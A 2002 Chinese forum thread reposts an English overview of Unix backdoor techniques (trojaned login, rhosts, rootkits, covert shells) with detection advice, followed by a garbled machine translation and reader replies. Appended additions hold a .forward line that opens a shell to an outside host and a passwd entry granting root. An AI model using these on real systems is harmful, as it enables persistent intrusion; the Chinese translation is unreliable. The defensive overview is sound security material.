黑客的后门技巧(中、英文)

Since the early days of intruders breaking into computers, they have tried to develop techniques or backdoors that allow them to get back into the system. In this paper, it will be focused on many of the common backdoors and possible ways to check for them. Most of focus will be on Unix backdoors with some discussion on future Windows NT backdoors. This will
describe the complexity of the issues in trying to determine the methods that intruders use and the basis for administrators understanding on how they might be able to stop the intruders from getting back in. When an administrator understands how difficult it would be to stop intruder once they are in, the appreciation of being proactive to block the intruder from ever getting in becomes better understood. This is intended to cover many of the popular commonly used backdoors by beginner and advanced intruders. This is not intended to cover every possible way to create a backdoor as the possibilities are limitless.

The backdoor for most intruders provide two or three main functions:

Be able to get back into a machine even if the administrator tries to secure it, e.g., changing all the passwords.

Be able to get back into the machine with the least amount of visibility. Most backdoors provide a way to avoid being logged and many times the machine can appear to have no one online even while an intruder is using it.

Be able to get back into the machine with the least amount of time. Most intruders want to easily get back into the machine without having to do all the work of exploiting a hole to gain access.

In some cases, if the intruder may think the administrator may detect any installed backdoor, they will resort to using the vulnerability repeatedly to get on a machine as the only backdoor. Thus not touching anything that may tip off the administrator. Therefore in some cases, the vulnerabilities on a machine remain the only unnoticed backdoor.


Password Cracking Backdoor

One of the first and oldest methods of intruders used to gain not only access to a Unix machine but backdoors was to run a password cracker. This uncovers weak passworded accounts. All these new accounts are now possible backdoors into a machine even if the system administrator locks out the intruder's current account. Many times, the intruder will look for unused accounts with easy passwords and change the password to something difficult. When the administrator looked for all the weak passworded accounts, the accounts with modified passwords will not appear. Thus the administrator will not be able to easily determine which accounts to lock out.

Rhosts + + Backdoor

On networked Unix machines, services like Rsh and Rlogin used a simple authentication method based on hostnames that appear in rhosts. A user could easily configure which machines not to require a password to log into. An intruder that gained access to someone's rhosts file could put a "+ +" in the file and that would allow anyone from anywhere to log into that account without a password. Many intruders use this method especially when NFS is exporting home directories to the world. These accounts become backdoors for intruders to get back into the system. Many intruders prefer using Rsh over Rlogin because it is many times lacking any logging capability. Many administrators check for "+ +" therefore an intruder may actually put in a hostname and username from another compromised account on the network, making it less obvious to spot.

Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions. Many system administrators relied on time-stamping and the system checksum programs, e.g., Unix's sum program, to try to determine when a binary file has been modified. Intruders have developed technology that will recreate the same time-stamp for the trojan file as the original file. This is accomplished by setting the system clock time back to the original file's time and then adjusting the trojan file's time to the system clock. Once the binary trojan file has the exact same time as the original, the system clock is reset to the current time. The sum program relies on a CRC checksum and is easily spoofed. Intruders have developed programs that would modify the trojan binary to have the necessary original checksum, thus fooling the administrators. MD5 checksums is the recommended choice to use today by most vendors. MD5 is based on an algorithm that no one has yet to date proven can be spoofed.

Login Backdoor

On Unix, the login program is the software that usually does the password authentication when someone telnets to the machine. Intruders grabbed the source code to login.c and modified it that when login compared the user's password with the stored password, it would first check for a backdoor password. If the user typed in the backdoor password, it would allow you to
log in regardless of what the administrator sets the passwords to. Thus this allowed the intruder to log into any account, even root. The password backdoor would spawn access before the user actually logged in and appeared in utmp and wtmp. Therefore an intruder could be logged in and have shell access without it appearing anyone is on that machine as that
account. Administrators started noticing these backdoors especially if they did a "strings" command to find what text was in the login program. Many times the backdoor password would show up. The intruders then encrypted or hid the backdoor password better so it would not appear by just doing strings. Many of the administrators can detect these backdoors with MD5 checksums.

Telnetd Backdoor

When a user telnets to the machine, inetd service listens on the port and receive the connection and then passes it to in.telnetd, that then runs login. Some intruders knew the administrator was checking the login program for tampering, so they modified in.telnetd. Within in.telnetd, it does several checks from the user for things like what kind of terminal the user was using. Typically, the terminal setting might be Xterm or VT100. An intruder could backdoor it so that when the terminal was set to "letmein", it would spawn a shell without requiring any authentication. Intruders have backdoored some services so that any connection from a specific source port can spawn a shell.

Services Backdoor

Almost every network service has at one time been backdoored by an intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even inetd, etc., have been floating around forever. There are programs that are nothing more than a shell connected to a TCP port with maybe a backdoor password to gain access. These programs sometimes replace a service like
uucp that never gets used or they get added to the inetd.conf file as a new service. Administrators should be very wary of what services are running and analyze the original services by MD5 checksums.

Cronjob backdoor

Cronjob on Unix schedules when certain programs should be run. An intruder could add a backdoor shell program to run between 1 AM and 2 AM. So for 1 hour every night, the intruder could gain access. Intruders have also looked at legitimate programs that typically run in cronjob and built backdoors into those programs as well.

Library backdoors

Almost every UNIX system uses shared libraries. The shared libraries are intended to reuse many of the same routines thus cutting down on the size of programs. Some intruders have backdoored some of the routines like crypt.c and _crypt.c. Programs like login.c would use the crypt() routine and if a backdoor password was used it would spawn a shell. Therefore,
even if the administrator was checking the MD5 of the login program, it was still spawning a backdoor routine and many administrators were not checking the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5 checksums of almost everything. One method intruders used to get around that is to backdoor the open() and file access routines. The backdoor routines were configured to read the original files, but execute the trojan backdoors. Therefore, when the MD5 checksum program was reading these
files, the checksums always looked good. But when the system ran the program, it executed the trojan version. Even the trojan library itself, could be hidden from the MD5 checksums. One way to an administrator could get around this backdoor was to statically link the MD5 checksum checker and run on the system. The statically linked program does not use the trojan shared libraries.

Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for libraries for bypassing MD5 checksum could be used at the kernel level, except even a statically linked program could not tell the difference. A good backdoored kernel is probably one of the hardest to find by administrators, fortunately kernel backdoor scripts have not yet been
widely made available and no one knows how wide spread they really are.

File system backdoors

An intruder may want to store their loot or data on a server somewhere without the administrator finding the files. The intruder's files can typically contain their toolbox of exploit scripts, backdoors, sniffer logs, copied data like email messages, source code, etc. To hide these sometimes large files from an administrator, an intruder may patch the files system commands like "ls", "du", and "fsck" to hide the existence of certain directories or files. At a very low level, one intruder's backdoor created a section on the hard drive to have a proprietary format that was designated as "bad" sectors on the hard drive. Thus an intruder could access those hidden files with only special tools, but to the regular
administrator, it is very difficult to determine that the marked "bad" sectors were indeed storage area for the hidden file system.

Bootblock backdoors

In the PC world, many viruses have hid themselves within the bootblock section and most antivirus software will check to see if the bootblock has been altered. On Unix, most administrators do not have any software that checks the bootblock, therefore some intruders have hidden some backdoors in the bootblock area.

Process hiding backdoors

An intruder many times wants to hide the programs they are running. The programs they want to hide are commonly a password cracker or a sniffer. There are quite a few methods and here are some of the more common:


An intruder may write the program to modify its own argv[] to make it look like another process name.

An intruder could rename the sniffer program to a legitimate service like in.syslog and run it. Thus when an administrator does a "ps" or looks at what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show
all the processes.

An intruder could patch a backdoor or program into an interrupt driven routine so it does not appear in the process table. An example backdoor using this technique is amod.tar.gz available on http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html  An intruder could modify the kernel to hide certain processes as well.

Rootkit

One of the most popular packages to install backdoors is rootkit. It can easily be located using Web search engines. From the Rootkit README, here are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.


Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but also they want to hide their network traffic as much as possible. These network traffic backdoors sometimes allow an intruder to gain access through a firewall. There are many network backdoor programs that allow an intruder to set up on a certain port number on a machine that will allow access
without ever going through the normal services. Because the traffic is going to a non-standard network port, the administrator can overlook the intruder's traffic. These network traffic backdoors are typically using TCP, UDP, and ICMP, but it could be many other kinds of packets.

TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number possibly where the firewall is not blocking that TCP port. Many times, they will be protected with a password just so that an administrator that connects to it, will not immediately see shell access. An administrator can look for these connections with netstat to see what ports are listening
and where current connections are going to and from. Many times, these backdoors allow an intruder to get past TCP Wrapper technology. These backdoors could be run on the SMTP port, which many firewalls allow traffic to pass for e-mail.

UDP Shell Backdoors

Administrator many times can spot a TCP connection and notice the odd behavior, while UDP shell backdoors lack any connection so netstat would not show an intruder accessing the Unix machine. Many firewalls have been configured to allow UDP packets for services like DNS through. Many times, intruders will place the UDP Shell backdoor on that port and it will be
allowed to by-pass the firewall.

ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive by sending and receiving ICMP packets. Many firewalls allow outsiders to ping internal machines. An intruder can put data in the Ping ICMP packets and tunnel a shell between the pinging machines. An administrator may notice a flurry of Ping packets, but unless the administrator looks at the data in the packets, an intruder can be unnoticed.

Encrypted Link

An administrator can set up a sniffer trying to see data appears as someone accessing a shell, but an intruder can add encryption to the Network traffic backdoors and it becomes almost impossible to determine what is actually being transmitted between two machines.

Windows NT

Because Windows NT does not easily allow multiple users on a single machine and remote access similar as Unix, it becomes harder for the intruder to break into Windows NT, install a backdoor, and launch an attack from it. Thus you will find more frequently network attacks that are spring boarded from a Unix box than Windows NT. As Windows NT advances in multi-user
technologies, this may give a higher frequency of intruders who use Windows NT to their advantage. And if this does happen, many of the concepts from Unix backdoors can be ported to Windows NT and administrators can be ready for the intruder. Today, there are already telnet daemons available for Windows NT. With Network Traffic backdoors, they are very feasible for
intruders to install on Windows NT.

Solutions

As backdoor technology advances, it becomes even harder for administrators to determine if an intruder has gotten in or if they have been successfully locked out.

Assessment

One of the first steps in being proactive is to assess how vulnerable your network is, thus being able to figure out what holes exist that should be fixed. Many commercial tools exist to help scan and audit the network and systems for vulnerabilities. Many companies could dramatically improve their security if they only installed the security patches made freely
available by their vendors.

MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines. This MD5 baseline should be built up before a hacker attack with clean systems. Once a hacker is in and has installed backdoors, trying to create a baseline after the fact could incorporate the backdoors into the baseline. Several companies had been hacked and had backdoors installed on
their systems for many months. Overtime, all the backups of the systems contained the backdoors. When some of these companies found out they had a hacker, they restored a backup in hopes of removing any backdoors. The effort was futile since they were restoring all the files, even the backdoored ones. The binary baseline comparison needs to be done before an
attack happens.

Intrusion detection

Intrusion detection is becoming more important as organizations are hooking up and allowing connections to some of their machines. Most of the older intrusion detection technology was log-based events. The latest intrusion detection system (IDS) technology is based on real-time sniffing and network traffic security analysis. Many of the network traffic backdoors can now easily be detected. The latest IDS technology can take a look at the DNS UDP packets and determine if it matches the DNS protocol requests. If the data on the DNS port does not match the DNS protocol, an alert flag can be signaled and the data captured for further analysis. The same principle can be applied to the data in an ICMP packet to see if it is the normal ping data or if it is carrying encrypted shell session.

Boot from CD-ROM.

Some administrators may want to consider booting from CD-ROM thus eliminating the possibility of an intruder installing a backdoor on the CD-ROM. The problem with this method is the cost and time of implementing this solution enterprise wide.

Vigilant

Because the security field is changing so fast, with new vulnerabilities
being announced daily and intruders are constantly designing new attack and
backdoor techniques, no security technology is effective without vigilance.

Be aware that no defense is foolproof, and that there is no substitute for
diligent attention.

-------------------------------------------------------------------------


you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"

permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).


---------------------------------------------------------------------------


you may want to add this "feature" that can act as a backdoor:

when specifying a wrong uid/gid in the /etc/password file,
most login(1) implementations will fail to detect the wrong
uid/gid and atoi(3) will set uid/gid to 0, giving superuser
privileges.

example:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.




中文:



从入侵者破坏的早的天成为计算机,他们已经努力去了开发允许他们报仇成为系统的技术或后门。
在这纸中,它将被集中于查对他们的共同的后门和可能的方法的很多。
大部分焦点将用一些关于将来的Windows NT后门的讨论在Unix后门上。
这将描述在努力去决定入侵者使用的方法的流出和在在他们可以能制止入侵者放入背的方法上明白的管理者的根据的复合状态。
如果他们在里边是当管理者明白它为了停止入侵者将多么难的时候,为了真地由于进去拦阻入侵者proactive的评价变得更好好地被充分理解。
这打算初学者和先进的入侵者覆盖流行的通常被使用的后门的很多。
这不打算覆盖所有制作后门的可能的方法,可能性无限制。
对大部分的入侵者来说后门提供2或者3主要的功能:
即使管理者努力去为它搞到例如改变全部口令,能报仇成为机器。
能用眼野的最少的数量报仇成为机器。
当入侵者使用它的时候,大部分的后门提供避免记录下来,机器能看来没有1在线的很多的时平坦的方法。
能用时间的最少的数量报仇成为机器。
大部分的入侵者简单地想不必须做全部为了得到接近开拓洞的工作而报仇成为机器。
在一些例子,如果入侵者可以想到管理者可以察觉任何安装的后门,他们将成重复地用脆弱性来让机器象唯一的后门那样明白去。
如此触摸可以把管理者颠倒过来的任何事。
因此在一些例子的,机器上的脆弱性一直是仅仅未受注目的后门。
在使后门破裂口令
被用来得到对Unix机器的接近仅仅而是后门的入侵者的第一个,而且最古时的方法的1让口令薄脆饼干跑了。
这揭开弱被passworded了的说明。
即使系统管理者把入侵者往来帐户赶出去,现在全部这些新说明都是通往机器的可能的后门。
很多的时,入侵者将寻找带简单的口令的未使用的说明,把口令变成难的事情。
当管理者寻找全部弱被passworded了的说明的时候,带修改的口令的说明将不出现。
这样管理者将不能简单地决心哪个给休业说明。
Rhosts+后门+
在成为网状的Unix机器上,服务喜欢Rsh,并且,rlogin使用了根据出现于rhosts的hostnames的简单的承认方法。
用户能使简单地成形了不给原木需要口令成为的哪个机器。
得到对一个人rhosts文件的接近的入侵者能把“++”放入文件了,并且,那个将从说明到原木不用口令而任何地方允许任何人成为那个。
尤其是当NFS到世界出口主目录的时候,很多的入侵者使用这方法。
这些说明对后门报仇成为系统为入侵者适当。
因为是缺乏任何记录下来的能力的很多的时间所以很多的入侵者宁愿选择在rlogin上面使用Rsh。
很多的管理者使它不那么对地点来说更明显的,查对入侵者可以从另一个调解的说明在网络上实际上放入hostname和用户名的因此“++”。
检查和,并且Timestamp Backdoors
早,很多的入侵者用他们自己的trojan版本替换了二进制。
很多系统管理者依赖time-stamping,并且,系统检查和编例如Unix合计程序的程序为了努力去决心二进制文件什么时候被修改。
入侵者已经开发了将让和最初的文件同样的时间-图章为trojan文件休养的技术。
这返送系统时钟时间到最初文件时间完成了,于是,调整trojan文件是系统时钟的时间。
如果二进制的trojan文件象原物那样有准确的相同的时间,系统时钟是对现在的时间的复位。
合计程序依靠CRC检查和,简单地被哄骗。
入侵者已经发展了编那个将把trojan的二进制改为有检查和必要的最初的——如此欺骗管理者——。
MD5检查和推荐的选择大部分的销售公司使用今日。
MD5根据任何人没有的十进制,可是,证明标有日期能被哄骗。
后门注册
Unix上的,注册程序是通常做口令承认的软件的时候,给机器的一个人遥控网络。
入侵者抓了对login.c的源代码,修改了它当注册把用户口令和储备的口令比较的时候,它将首先查对后门的口令。
如果用户打后门的口令,它将允许你与管理者把口令放到上的无关地请求联机。
这样这给原木允许了入侵者成为任何说明,甚至根。
在用户实际上请求联机,出现于utmp和wtmp之前后门的口令将产接近。
因此入侵者能在里边被记录下来,不用它而让外壳接近好象任何人都在那个机器上象那个说明那样。
尤其是如果他们给发现正文的的“线”命令带来注册程序管理者开始了注意到这些后门。
后门的口令将出来很多的时。
然后入侵者更好好地译成密码了,或者把后门的口令藏起来了,所以,它将不通过正好做线出现。
管理者的很多能用MD5检查和察觉这些后门。
Telnetd Backdoor
的时候,inetd服务在上听的给机器的用户遥控网络港口,并且收到然后对in.telnetd的它,那个跑的连接和然后的穿过注册。
一些入侵者知道管理者为了篡改检查注册程序,所以,他们修改了in.telnetd。
在in.telnetd的范围内,它用户使用什么种类的终端象那样从用户为事情做几个核对。
典型地,终端的设定可以是Xterm或VT100。
入侵者后门能这样的它,为了终端在的时候着手“letmein”,它将不需要任何承认而产外壳。
入侵者已经backdoored了一些服务,这样,任何来自特定的源港口的连接都能产外壳。
后门服务
几乎都所有网络服务都已经入侵者一度backdoored了。
手指头的被Backdoored了的版本,rsh,rexec,rlogin,ftp,甚至inetd都,等等永远在传播。
编那个是只不过是也许为了得到接近到TCP港口和后门的口令有关系的外壳。
这些有时编程序替换象新服务那样被加到inetd.conf文件上的象不决被使用,或者他们得到的Unix到Unix的拷贝那样的服务。
管理者应该服务跑的非常小心,MD5检查和分析最初的服务。
后门Cronjob
当某的时候,在Unix时间表上Cronjob编应该跑。
入侵者为了在上午1点和上午2点之间跑能加了后门的外壳程序这样1小时的每晚,入侵者能得到了接近。
另外, 入侵者已经看了合法编另外,典型地通往那些的cronjob和建造的后门里的跑编程序。
图书馆后门
几乎都所有UNIX系统都使用共同地享有的图书馆。
共同地享有的图书馆打算把在如此减去规模的相同的日常工作的很多再使用编。
一些入侵者已经象crypt.c和_crypt.c那样backdoored了日常工作的一些。
编嗜好login.c将使用crypt()日常工作和条件后门的口令被使用了它将产外壳。
因此,即使管理者检查注册程序的MD5,它在还产后门的日常工作,并且,很多的管理者不在象后门的可能的根源那样检查图书馆。
给很多的入侵者的1问题是一些管理者开始MD5几乎都的一切的检查和。
入侵者用来让那个明白的1方法到后门是open()和文件存取程序。
后门的日常工作为了读最初的文件,但是实行trojan的后门被成形了。
因此,当MD5检查和程序读这些文件的时候,检查和总是看起来好。
但是,当系统实施程序的时候,它实行了trojan版本。
甚至trojan的图书馆本身都能被瞒着MD5检查和了。
通往管理者的路能在这后门周围得到的一个静止地连接MD5检查和检验器,把系统放在一起。
静止地连接的程序不使用trojan的共同地享有的图书馆。
核后门
Unix上的核是Unix运行的方法的心。
为图书馆为了绕过MD5检查和被使用的相同的方法能在核水平被使用了,除了甚至静止地连接的程序都不能说差异。
也许好被backdoored了的核是为了找到行政官员最坚硬的1幸运地核的后门的手稿没大范围地还被使根本可以利用,而且一个知道方法宽阔地扩展他们真是。
文件系统后门
入侵者可以想不用在发现文件的管理者而大致储备他们的掠夺物或有关服务器的数据。
入侵者文件能典型地包括他们的功勋手稿,后门,sniffer原木,象电子信件信息那样的复印的数据,源代码,等等的toolbox
有时大大藏起来这些入侵者可以修补的从管理者的文件文件系统指令希望“ls”,“du”和“fsck”把某文件夹或文件的存在藏起来。
在非常低的水平,1入侵者为了有被指明的持有人的格式被制作有关硬磁盘机的一部分的后门在硬磁盘机上“命令”了部门。
这样入侵者能用特殊的工具仅仅接近了那些藏起来的文件,但是,对于有规则的管理者,显著的“坏的”部门真地是给藏起来的文件系统的存储区,这非常难以决定。
Bootblock后门
在PC世界,很多的病毒已经在bootblock一部分的范围内藏起来了,并且,大部分的antivirus软件为了看一看bootblock是否被改变将开支票。
在Unix上,大部分的管理者没有任何检查bootblock的软件,因此一些入侵者已经把一些后门在bootblock地区藏起来了。
在把后门藏起来过程
入侵者想藏起来很多的时编他们在跑。
编他们想得到藏起来通常是口令薄脆饼干或sniffer。
有非常多方法,并且,更多的共有地的一些在这里是:
入侵者为了把它自己argv[]改为使它好象是另一个过程名字可以写程序。
入侵者能改变对象in.syslog那样的合法的服务的sniffer程序的名字,让它跑。
这样管理者做一“ps”的时候或标准的服务命名的看跑的出现。
入侵者能修改了图书馆日常工作,这样,“ps”不显示全部过程。
入侵者能修补了后门或程序成为挤入的开动的日常工作,所以,它不出现于过程桌子。
在使用这技术的例子后门是入侵者为了把某过程藏起来能象那样好好地修改核的http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html上可以利用的amod.tar.gz。
Rootkit
最流行的为了安装后门的包的1是rootkit。
它能简单地使用网查找机坐落。
从Rootkit README在这里是被安装的典型的文件:
z2-
除掉来自utmp,wtmp和lastlog的进入。
Es

rokstar给sun4的ethernet sniffer形成核的基础了。
固定

努力去仿制检查和,带相同的日期/perms/u/g的安装。
Sl

成为经过被送到注册的有魔力的口令的根。
Ic

修改的为了除掉PROMISC的ifconfig从输出无力地垂下。
ps :
藏起来过程。
毫微秒

修改的为了把连接藏起来的某netstat可用机器加工。
Ls

来自存在的隐藏的地方的某文件夹和文件列入价目表了。
du5

隐藏的地方方法的多的空间在在你的硬磁盘机上被使用。
ls5

来自存在的隐藏的地方的某文件和文件夹列入价目表了。
网络交通后门
为了把他们的轨道在机器上藏起来别仅仅做入侵者需要的东西,但是,另外, 他们想把他们的网络交通尽可能地非常藏起来。
有时这些网络交通后门允许入侵者通过Internet 防火墙得到接近。
有后门编的很多的网络允许入侵者向某端口号在真地将不穿过通常的服务而允许接近的机器上出发。
因为交通去非标准的网络港口所以,管理者能俯视入侵者交通。
这些网络交通后门在典型地使用TCP,UDP和ICMP,但是,它能是很多的其他的种类的包。
TCP剥后门的壳
在Internet 防火墙不拦阻那个TCP港口的地方入侵者能在一些高的端口号上有可能安放好这些TCP外壳后门。
很多的时,他们将用给它连起来的管理者将不立即知道剥接近的壳的正好这样的口令被保护。
管理者能寻找这些与到/从看港口听是的和现在的连接去的地方的netstat的连接。
很多的时,这些后门允许入侵者得到过去的TCP包装的人技术。
这些后门能在简单邮件传输协议港口上运转了,很多的Internet 防火墙允许交通作为电子信件出现。
UDP剥后门的壳
管理人员能弄脏TCP连接,注意到奇特的行为很多的时,另一方面,UDP外壳后门缺乏任何连接,所以,netstat将不显示在接近Unix机器的入侵者。
很多的Internet 防火墙为了认为给服务的UDP包全喜欢DNS已经被成形了。
很多的时,入侵者将放后门的UDP外壳到那个港口上,并且,有人将使它绕过Internet 防火墙。
ICMP剥后门的壳
砰砰的声音是明白机器是否发送并接收ICMP包活的的最共同的方法的1。
很多的Internet 防火墙给砰砰的声音的内部的机器允许门外汉。
入侵者能把数据放入砰砰的声音ICMP包,在呼啸的机器之间的外壳挖地道。
管理者可以注意到砰砰的声音包的慌张,但是,除非管理者在包中看数据,入侵者能未受注目。
链环译成密码
管理者能安放好在努力去知道数据象接近外壳的一个人那样出现的sniffer,但是,入侵者能把密码化加到网络交通后门上,并且,什么在2台机器之间实际上被传送几乎都变得不可能决定。
Windows NT
因为Windows NT不在单一的机器和类似的远距离接入上象Unix那样简单地允许复数的用户所以,闯入,安装后门,从它着手攻击入侵者变得更坚硬。
这样你将频繁地发现作为从Unix箱子被铺上板的弹簧的网络攻击更多Windows NT如同Windows NT来到多用户的技术的上边的那样,这可以给给他们的优点使用Windows NT的入侵者的更主要的频率。
并且,如果这的确要发生,来自Unix后门的概念的很多能被移植到Windows NT,并且,管理者能入侵者准备好了。
今天,为Windows NT已经有可以利用的遥控网络精灵用网络交通后门的,他们给安装在Windows NT上对入侵者来说非常可实行。
解决方案
如同后门的技术前进的那样,决心入侵者是否进去,或者他们是否成功地被赶出去管理者变得更更坚硬。
估价
proactive的第一个步骤的1为了对脆弱的方法进行估价是你的网络,这样计划能断定存在什么洞应该被固定。
为了帮助为脆弱性搜寻,旁听网络和系统存在很多的商用的工具。
如果他们仅仅安装自由地使他们的销售公司可以利用的安全修补很多的公司能显著地改善了他们的安全。
MD5底线
系统扫描仪的1必要的组成部分是MD5检查和底线。
这MD5底线应该在电脑黑客攻击前面用清洁的系统被增加。
如果电脑黑客在里边,安装后门,努力去在事实后面制作底线能使后门混合于了底线。
几个公司已经被劈砍了,把后门安装很多的月在他们的系统上了。
在规定时间外,全部系统的备份都包括了后门。
当这些公司的一些明白他们有电脑黑客的时候,他们怀着除掉任何后门的希望返回了备份。
他们返回全部文件之后努力无益,甚至被backdoored了的东西。
在攻击发生之前二进制的底线比较需要被做。
侵入发现
侵入发现在变得更重要,组织在被钩住,在允许与他们的机器的一些的连接。
大部分更古时的侵入发现技术是原木根据的事件。
(IDS)最新的侵入发现系统的技术根据在嗅气味的实时和网络交通安全分析。
网络交通后门的很多能现在简单地被察觉。
最新的IDS技术能给看DNS的带去UDP包,决心它是否和DNS议定书要求相称。
如果有关DNS港口的数据不和DNS议定书相称,有警惕性的旗能被送信号,并且数据为更进一步的分析俘获了。
相同的原则为了看一看它是否是通常的砰砰的声音数据,或者它是否运译成密码的外壳开庭能到数据在ICMP包中被应用。
从光盘驱动器踢。
一些管理者可以想考虑从在如此删除在把后门安装在光盘驱动器上的入侵者的可能性的光盘驱动器踢。
这方法发生的问题是宽阔地实现这解决方案企业的成本和时间。
警戒着
安全原野如此迅速变,用被发表的新脆弱性每天,并且因为入侵者经常设计新攻击和后门的技术所以,安全性技术不不用警戒而有效。
知道防御不极其简单,并且为勤奋的注意没有代替品。
-------------------------------------------------------------------------
你可以想加进来:

向前后门
在Unix机器上,另外, 放指令成为.forward文件是恢复接近的共同的方法。
.forward文件可以象那样被作的说明username'’跟在后面:
用户名|”/usr/local/X11/bin/xterm-disp hacksys.other.dom : 0.0-e/bin/sh”
这方法的排列包括系统邮件别名文件的(通常最坐落以及其他等等/别名)变更在内。
这是简单的排列的注更先进能跑来自能经stdin拿任意的指令(小preprocessing在后面)的前面的文件的简单的手稿。
(书信)又及:
另外, 上述的方法是公司mailhub(在那里设想委托人和服务器上的主目录FS共同拥有)的起作用的得到的接近。
>
使用smrsh能有效地否定这后门尽管它完全地是
>
有可能还你给事情的问题条件喜欢elm过泸器,或者
>
能跑的procmail编他们自己的程序。
---------------------------------------------------------------------------
你可以想加这能扮演后门的角色的“特点”:
在里边指定错误的uid/gid的时候,以及其他等等/口令文件,实现为了察觉错误的uid/gid将失败的大部分的login(1)和atoi(3)将放在给超级用户特权的uid/对0的gid。
例子:
rmartin::x:x50:50:R. Martin:/home/rmartin:/bin/tcsh
on Linux boxes, this will give uid 0 to user rmartin.     Re:黑客的后门技巧(中、英文)

太好了,我刚想要,前不久电脑被黑,想知道落洞在哪,全方网络,谢谢了....^_^     Re:黑客的后门技巧(中、英文)

装防火墙啊!     Re:黑客的后门技巧(中、英文)

- -b
晕倒     Re:黑客的后门技巧(中、英文)

真是想得周到啊!
中英都有啊!     Re:黑客的后门技巧(中、英文)

好是好就是太长了     Re:黑客的后门技巧(中、英文)

中文很乱啊,写的乱七八糟的.......
防火墙装了,还是.......     Re:黑客的后门技巧(中、英文)

真长没耐心看下去     Re:黑客的后门技巧(中、英文)

昏!     Re:黑客的后门技巧(中、英文)

是吗??好长     Re:黑客的后门技巧(中、英文)

英文的还够通顺,中文的就乱七八糟了。。。。一定用了翻译软件。。。。。。     Re:黑客的后门技巧(中、英文)

虽然我不是很懂,但是这也太乱了     Re:黑客的后门技巧(中、英文)

英雄所见略同哈~~~~~~~~~~
没办法了啊~~~~~~~~~~~~
我家的电脑从不上网所以不用怕啊~~~~~~~~~~     It\'s too long

太长了     Re:黑客的后门技巧(中、英文)

长不要紧,重要是句子不很通顺:(     Re:黑客的后门技巧(中、英文)

看的头晕     Re:黑客的后门技巧(中、英文)

什么鸡吧玩意???
看不懂啊~~~~~~
谁可以教教我啊???     Re:黑客的后门技巧(中、英文)

俺电脑从不装防火强和杀毒软件
内为防火强和杀毒软件能解决的问题我也能手工解决
装了只会影响速度     Re:黑客的后门技巧(中、英文)

/K0o.php?p=http://go7.163.com/idsee/1004492204mk2qqI4W.jpg     Re:黑客的后门技巧(中、英文)

头在痛……晕呀~~~~~~~~~怎么外看了没久还没看完?!     Re:黑客的后门技巧(中、英文)

看不懂英文的
连中问的也看不懂
一点都不专业
还抄出来干什么?
反正都没有人可以看完
写了也是浪费~~     Re:黑客的后门技巧(中、英文)

会有人看的啦~~~     Re:黑客的后门技巧(中、英文)

反正我是不会去看的~     Re:黑客的后门技巧(中、英文)

我看了但是我看不懂     Re:黑客的后门技巧(中、英文)

和楼上的一样,路过~~     Re:黑客的后门技巧(中、英文)

提示: 作者被禁止或删除 内容自动屏蔽     Re:黑客的后门技巧(中、英文)

very good
yougexin




欢迎光临 空网论坛 (http://bbs.kongweb.net/) 作者: hiya6    时间: 2002-8-9 12:58